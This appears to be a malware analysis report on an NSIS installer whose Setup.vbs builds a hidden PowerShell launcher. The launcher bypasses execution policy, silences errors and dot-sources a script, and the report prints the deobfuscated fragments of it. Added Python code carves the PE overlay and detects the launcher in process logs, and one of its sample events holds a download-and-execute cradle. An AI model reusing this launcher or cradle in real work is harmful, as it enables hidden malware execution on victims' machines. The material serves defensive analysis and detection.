| Hash | Hash Value |
|---|---|
| MD5 | b07f16a3b524017d20d360823c09b956 |
| SHA-1 | f680fbbf487f61c9bd231e48f83a9e1c092ceb6a |
| SHA-256 | 4e5b2ae91379b8069c04c6639bb0bca5ddea0dde567bea8cb9bc9822b9cdda0d |
| SHA-384 | 9010953b26f91d9e96abf654e4f4c5e68474a177af6352ccfa9dfe573cf11165cace814c79df1bd9f8214933960847a9 |
| SHA-512 | 35478fef67de169e32d7daffa3ae12a92b44d0953bf4607382816756bdd7d15ba42fb55afcc9b08d2bc01de1132a3a07f37ac7a82ccdcb9861ad1b6842d771d5 |
| ssdeep | 24576:iw+tSVHEX47Z8E/X0xZ0Id+7IsJSa/aqGK1CIOJC1+0sPiB4HM:n+ekXkQvPd+3JS1+1CQpbB4s |
| TLSH | BF3523C1314084D7FFF395791867CF9BD4A49D5086B4A34B03E13B8AA4F28D7BB2A625 |
|
PeID

| Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | Overlay extracted: Overlay_07fdfc8a.bin (1044745 bytes) |
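The second PeID row says the tool carved an overlay, the bytes appended after the last section of the PE, which is where an NSIS installer keeps its compressed payload. The following is an added illustration of that carve, not the analysis tool's own code: it walks the section table to find where the mapped image ends, returns everything after it, and checks for the NSIS first-header marker (0xDEADBEEF followed by "NullsoftInst", the signature 7-Zip's NSIS reader looks for, assumed here to sit at overlay offset 4 as it does in unmodified NSIS builds). The PE it parses is a minimal one constructed inside the block; the overlay bytes and section layout are synthetic and stand in for the real 1044745-byte overlay.

```python
import struct

# 0xDEADBEEF + "NullsoftInst": the NSIS first-header signature, 4 bytes into the overlay.
NSIS_SIGNATURE = b"\xef\xbe\xad\xdeNullsoftInst"


def carve_overlay(data: bytes) -> dict:
    """Locate the end of the last section and return everything after it.

    The offset is max(PointerToRawData + SizeOfRawData) over all sections, which is
    what "overlay" means for a PE; a truncated file simply yields an empty overlay.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)    # COFF NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)     # COFF SizeOfOptionalHeader
    sec_table = e_lfanew + 24 + opt_size                           # 4 (sig) + 20 (COFF) + optional
    end_of_image = sec_table + 40 * n_sections                     # never below the headers
    for i in range(n_sections):
        # Section header: Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
        raw_size, raw_ptr = struct.unpack_from("<II", data, sec_table + 40 * i + 16)
        end_of_image = max(end_of_image, raw_ptr + raw_size)
    overlay = data[end_of_image:]
    return {
        "offset": end_of_image,
        "size": len(overlay),
        "overlay": overlay,
        "nsis": overlay.find(NSIS_SIGNATURE) != -1,
    }


def build_sample_pe(overlay: bytes) -> bytes:
    """Constructed minimal PE32 (one .text section, file-aligned at 0x200) plus an overlay."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0102)   # i386, 1 section, PE32 opt hdr
    optional = struct.pack("<H", 0x10B).ljust(224, b"\x00")           # magic only; rest unused here
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000,
                          0x200, 0x200, 0, 0, 0, 0, 0x60000020)      # raw data at 0x200, 0x200 long
    headers = (dos_header + b"PE\0\0" + coff + optional + section).ljust(0x200, b"\x00")
    text = b"\xCC" * 0x200
    return headers + text + overlay


# Constructed overlay: NSIS flags field, the signature, then stand-in payload bytes.
SAMPLE_OVERLAY = b"\x00" * 4 + NSIS_SIGNATURE + b"\x00" * 8 + b"constructed payload bytes"


if __name__ == "__main__":
    result = carve_overlay(build_sample_pe(SAMPLE_OVERLAY))
    print(f"overlay at 0x{result['offset']:x}, {result['size']} bytes, nsis={result['nsis']}")
```

One caveat a real carver has to handle: an Authenticode signature (the IMAGE_DIRECTORY_ENTRY_SECURITY blob) also lives past the last section, so a signed binary always shows a non-empty "overlay" by this definition; subtract the certificate table's range before deciding whether anything else was appended.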
|
Each row below is one PowerShell command line recovered from Setup.vbs inside the NSIS installer; fragments the deobfuscator could not parse are reported as [Unmanaged(...)] AST nodes. Read together, the rows show the script assembling `powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command "& { try { $ErrorActionPreference='SilentlyContinue'; . '<path in var_8 / psScript>'; } catch {} }"` and starting it through WScript.Shell.Run with window style 0 (hidden) and no wait.

| Name | Value | Verdict | Location |
|---|---|---|---|
| Deobfuscated PowerShell | `[Unmanaged(ErrorExpressionAst)] " psCmd = psCmd & "-NoLogo -noprofile -NonInteractive -Command " psCmd = psCmd & "" & try { $ErrorActionPreference = "SilentlyContinue" psCmd = psCmd & psScript psCmd = psCmd & psCmd = psCmd & psScript psCmd = psCmd & } catch { } "" WshShell.Run psCmd, 0, False Set FSO = Nothing Set WshShell = Nothing WScript.Quit"` | Malicious | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > [PowerShell Command] |
| Deobfuscated PowerShell | `" var_9 = " powershell -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command " var_9 = " "powershell" -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit` | Malicious | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] |
| Deobfuscated PowerShell | `[Unmanaged(ErrorExpressionAst)] "Bypass" -WindowStyle [Unmanaged(ErrorExpressionAst)] "Hidden" -NoLogo -noprofile -NonInteractive -Command " var_9 = " "powershell" -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit` | Malicious | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | `"" try { $ErrorActionPreference = "SilentlyContinue" & var_8 var_9 = var_9 & & var_8 var_9 = var_9 & } catch { } "" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit"` | Malicious | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] > [PowerShell Command] |
| PE Layout | MemoryMapped (process dump suspected) | | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > kHyhuRdlc5Xs.part-jadoo |
| Deobfuscated PowerShell | `" var_9 = " powershell -ExecutionPolicy "Bypass" -WindowStyle "Hidden" -NoLogo -NoProfile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit` | Malicious | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | `[Unmanaged(ErrorExpressionAst)] "Bypass" -WindowStyle [Unmanaged(ErrorExpressionAst)] "Hidden" -NoLogo -noprofile -NonInteractive -Command "" & [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit` | Malicious | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | `"" [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '""" var_9 = "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command ""& { try { $ErrorActionPreference='SilentlyContinue'; . '""" & var_8 var_9 = var_9 & """'; } catch {} }""" var_5.Run var_9, 0.0, False Set var_6 = Nothing Set var_5 = Nothing WScript.quit` | Malicious | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | `& [Unmanaged(ErrorStatementAst)] try { $ErrorActionPreference='SilentlyContinue'; . '` | Malicious | b07f16a3b524017d20d360823c09b956 > [NSIS Installer] @ #0000D808 > Setup.vbs > Setup.vbs.deobfuscated.vbs > [Command #2] > [PowerShell Command] |
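The launcher the table recovers is a good shape to hunt for in process-creation telemetry: a PowerShell started with execution policy bypassed and the window hidden, whose -Command body silences errors, dot-sources a file and swallows exceptions with an empty catch, spawned by a script host. The block below is an added example written for this report, not code from the analysis tool: it scores Sysmon Event ID 1 / Security 4688 style records for those indicators and pulls out the dot-sourced path. The events are constructed, the script path in them is a placeholder rather than a name from this sample, and the patterns assume (as powershell.exe documents) that any unambiguous prefix of a switch is accepted, so -ep, -w, -nop and -noni are matched alongside the full spellings the dropper uses.

```python
import re

# Indicators taken from the launcher Setup.vbs assembles in this report:
#   powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive
#     -Command "& { try { $ErrorActionPreference='SilentlyContinue'; . '<script>'; } catch {} }"
# powershell.exe accepts unambiguous switch prefixes (-ep, -w, -nop, -noni), so each
# pattern is written to match the abbreviated spellings as well.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-e[a-z]*\s+bypass", re.I),
    "window_hidden":      re.compile(r"-w[a-z]*\s+hidden", re.I),
    "no_profile":         re.compile(r"-nop[a-z]*\b", re.I),
    "non_interactive":    re.compile(r"-noni[a-z]*\b", re.I),
    "errors_silenced":    re.compile(r"\$ErrorActionPreference\s*=\s*['\"]SilentlyContinue['\"]", re.I),
    "empty_catch":        re.compile(r"catch\s*\{\s*\}", re.I),
}
# The dot-source operator followed by a quoted path:  . 'C:\path\file'
DOT_SOURCE = re.compile(r"""(?:^|[\s{;])\.\s+(['"])([^'"]+)\1""")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")


def analyse(event: dict) -> dict:
    """Score one process-creation event (ParentImage / Image / CommandLine fields)."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    match = DOT_SOURCE.search(cmd)
    dot_sourced = match.group(2) if match else None
    from_script_host = event.get("ParentImage", "").lower().endswith(SCRIPT_HOSTS)

    # A hidden or bypass PowerShell that dot-sources a file with errors silenced is the
    # exact shape of this dropper's launcher; fewer indicators only earn "suspicious".
    if dot_sourced and "errors_silenced" in hits and (
        "exec_policy_bypass" in hits or "window_hidden" in hits
    ):
        verdict = "malicious"
    elif len(hits) + int(from_script_host) >= 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {
        "verdict": verdict,
        "indicators": hits,
        "dot_sourced": dot_sourced,
        "from_script_host": from_script_host,
    }


POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events. The .ps1 path is a placeholder, not a file named in this report.
SAMPLE_EVENTS = [
    {   # what the Setup.vbs launcher produces once WScript.Shell.Run fires
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": POWERSHELL,
        "CommandLine": r'''powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NoProfile -NonInteractive -Command "& { try { $ErrorActionPreference='SilentlyContinue'; . 'C:\Users\Public\stage2.ps1'; } catch {} }"''',
    },
    {   # abbreviated switches, download cradle, no dot-source: only suspicious
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": POWERSHELL,
        "CommandLine": r'''powershell -ep bypass -w hidden -nop -c "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"''',
    },
    {   # an administrator's interactive one-liner
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": POWERSHELL,
        "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Logs",
    },
]


def run(events=SAMPLE_EVENTS) -> list:
    return [analyse(e) for e in events]


if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, run()):
        parent = ev["ParentImage"].rsplit("\\", 1)[-1]
        print(f"{res['verdict']:10} parent={parent:13} {res['indicators']} {res['dot_sourced']}")
```

The cheapest filter to run first is the parent/child pair alone (wscript.exe or cscript.exe spawning powershell.exe); the command-line indicators then separate this launcher from the many legitimate scripts that also pass -NoProfile.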